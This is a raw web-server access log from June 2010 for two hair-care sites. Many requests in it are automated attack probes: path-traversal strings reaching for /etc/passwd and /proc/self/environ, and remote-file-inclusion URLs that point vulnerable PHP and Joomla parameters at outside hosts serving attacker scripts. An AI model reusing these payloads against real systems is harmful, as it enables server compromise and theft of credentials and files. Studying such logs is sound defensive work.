211.203.180.144 - - [14/Jun/2010:07:04:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:04:33 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:04:59 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:04:59 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:04:59 -0700] "GET /logs/access_100322.log//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:05:07 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:05:07 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:05:09 -0700] "GET /logs/access_100322.log//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:05:21 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:05:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:05:22 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:05:48 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:05:48 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:05:49 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
205.251.131.18 - - [14/Jun/2010:07:05:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:05:56 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:05:56 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [14/Jun/2010:07:05:58 -0700] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.13.74 - - [14/Jun/2010:07:09:27 -0700] "GET /?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 200 926 "-" "libwww-perl/5.834" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:09:46 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:09:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.203.180.144 - - [14/Jun/2010:07:09:47 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.228.54.4 - - [14/Jun/2010:07:09:54 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:07:11:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
89.111.176.88 - - [14/Jun/2010:07:11:34 -0700] "GET /?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
207.46.204.243 - - [14/Jun/2010:07:11:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
91.103.220.36 - - [14/Jun/2010:07:12:39 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
207.46.204.243 - - [14/Jun/2010:07:12:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
74.118.193.84 - - [14/Jun/2010:07:14:59 -0700] "GET /freehairsecretsphp/posting.php?mode=newtopic&f=1+%5BPLM=0%5D%5BN%5D+GET+http://freehairsecrets.com/freehairsecretsphp/posting.php?mode=newtopic&f=1+%5B0,31065,31686%5D+-%3E+%5BN%5D+POST+http://freehairsecrets.com/freehairsecretsphp/posting.php+%5B12902,0,12891%5D HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/posting.php?mode=newtopic&f=1+%5BPLM=0%5D%5BN%5D+GET+http://freehairsecrets.com/freehairsecretsphp/posting.php?mode=newtopic&f=1+%5B0,31065,31686%5D+-%3E+%5BN%5D+POST+http://freehairsecrets.com/freehairsecretsphp/posting.php+%5B12902,0,12891%5D" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "freehairsecrets.com"
74.118.193.84 - - [14/Jun/2010:07:14:59 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "freehairsecrets.com"
69.163.180.32 - - [14/Jun/2010:07:15:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:07:17:04 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:07:17:05 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.49.196 - - [14/Jun/2010:07:17:05 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
69.175.13.74 - - [14/Jun/2010:07:25:15 -0700] "GET /logs/access_100125.log//?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.175.13.74 - - [14/Jun/2010:07:25:15 -0700] "GET /?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 200 926 "-" "libwww-perl/5.834" "growlonghairfast.com"
69.175.13.74 - - [14/Jun/2010:07:25:15 -0700] "GET /logs//?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 200 5948 "-" "libwww-perl/5.834" "growlonghairfast.com"
66.249.65.238 - - [14/Jun/2010:07:26:09 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
91.121.208.42 - - [14/Jun/2010:07:26:52 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:07:26:52 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.208.42 - - [14/Jun/2010:07:26:52 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
67.228.54.4 - - [14/Jun/2010:07:27:37 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.228.54.4 - - [14/Jun/2010:07:27:38 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.228.54.4 - - [14/Jun/2010:07:27:38 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
85.64.207.220 - - [14/Jun/2010:07:28:00 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
85.64.207.220 - - [14/Jun/2010:07:28:00 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
72.47.211.173 - - [14/Jun/2010:07:32:25 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
89.111.176.88 - - [14/Jun/2010:07:35:33 -0700] "GET /logs/access_100125.log//?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.111.176.88 - - [14/Jun/2010:07:35:34 -0700] "GET /?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.0" 200 910 "-" "libwww-perl/5.805" "growlonghairfast.com"
89.111.176.88 - - [14/Jun/2010:07:35:34 -0700] "GET /logs//?_zb_path=http://barbpitcock.com/tmp/images/img03.jpg? HTTP/1.1" 200 5948 "-" "libwww-perl/5.805" "growlonghairfast.com"
95.131.67.183 - - [14/Jun/2010:07:39:48 -0700] "GET /logs/access_100201.log//board/delete_comment.php//bbs//delete_comment.php?board_skin_path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.131.67.183 - - [14/Jun/2010:07:39:48 -0700] "GET /board/delete_comment.php//bbs//delete_comment.php?board_skin_path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.131.67.183 - - [14/Jun/2010:07:39:48 -0700] "GET /logs//board/delete_comment.php//bbs//delete_comment.php?board_skin_path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.198.95 - - [14/Jun/2010:07:40:32 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 983040 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
119.63.198.72 - - [14/Jun/2010:07:40:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14642 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
119.63.198.105 - - [14/Jun/2010:07:40:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13706 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:41:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:41:05 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:41:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:41:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:41:17 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [14/Jun/2010:07:41:17 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://wagnersnet.com/1.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
205.251.131.18 - - [14/Jun/2010:07:42:34 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
205.251.131.18 - - [14/Jun/2010:07:42:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
205.251.131.18 - - [14/Jun/2010:07:42:34 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.131.67.183 - - [14/Jun/2010:07:43:48 -0700] "GET /board/delete_comment.php//bbs//delete_comment.php?board_skin_path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.131.67.183 - - [14/Jun/2010:07:43:48 -0700] "GET /logs//board/delete_comment.php//bbs//delete_comment.php?board_skin_path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.131.67.183 - - [14/Jun/2010:07:43:48 -0700] "GET /logs/access.log//board/delete_comment.php//bbs//delete_comment.php?board_skin_path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
178.93.32.252 - - [14/Jun/2010:07:44:17 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.00 (Windows NT 5.1; U; ru)" "growlonghairfast.com"
178.93.32.252 - - [14/Jun/2010:07:44:17 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.00 (Windows NT 5.1; U; ru)" "growlonghairfast.com"
203.211.149.167 - - [14/Jun/2010:07:44:45 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.149.167 - - [14/Jun/2010:07:44:46 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.149.167 - - [14/Jun/2010:07:44:46 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.212.226.240 - - [14/Jun/2010:07:45:01 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.212.226.240 - - [14/Jun/2010:07:45:02 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "growlonghairfast.com"
203.211.149.167 - - [14/Jun/2010:07:45:46 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:45:47 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:45:50 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:45:50 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:46:13 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:46:13 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:46:13 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:46:50 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:46:51 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:46:52 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:47:08 -0700] "GET /logs/access_100412.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:47:09 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:47:09 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.142.209.202 - - [14/Jun/2010:07:47:43 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:48:02 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:48:14 -0700] "GET /bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:48:14 -0700] "GET /logs/access_091123.log%20%20//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:48:14 -0700] "GET /logs//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:48:14 -0700] "GET /logs/access_091221.log//main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:48:41 -0700] "GET /logs/access_091123.log%20%20//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:48:41 -0700] "GET /bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.6.90 - - [14/Jun/2010:07:48:41 -0700] "GET /logs//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://thedoverhotel.com/logs/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.88.4.141 - - [14/Jun/2010:07:48:52 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
203.211.129.97 - - [14/Jun/2010:07:49:40 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
203.211.129.97 - - [14/Jun/2010:07:49:41 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
65.162.17.11 - - [14/Jun/2010:07:49:56 -0700] "GET /logs/access_091123.log//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.162.17.11 - - [14/Jun/2010:07:49:56 -0700] "GET /logs//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.162.17.11 - - [14/Jun/2010:07:49:56 -0700] "GET /bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:50:09 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:50:09 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.59.0.167 - - [14/Jun/2010:07:50:10 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.211.149.167 - - [14/Jun/2010:07:50:10 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.59.0.167 - - [14/Jun/2010:07:50:19 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
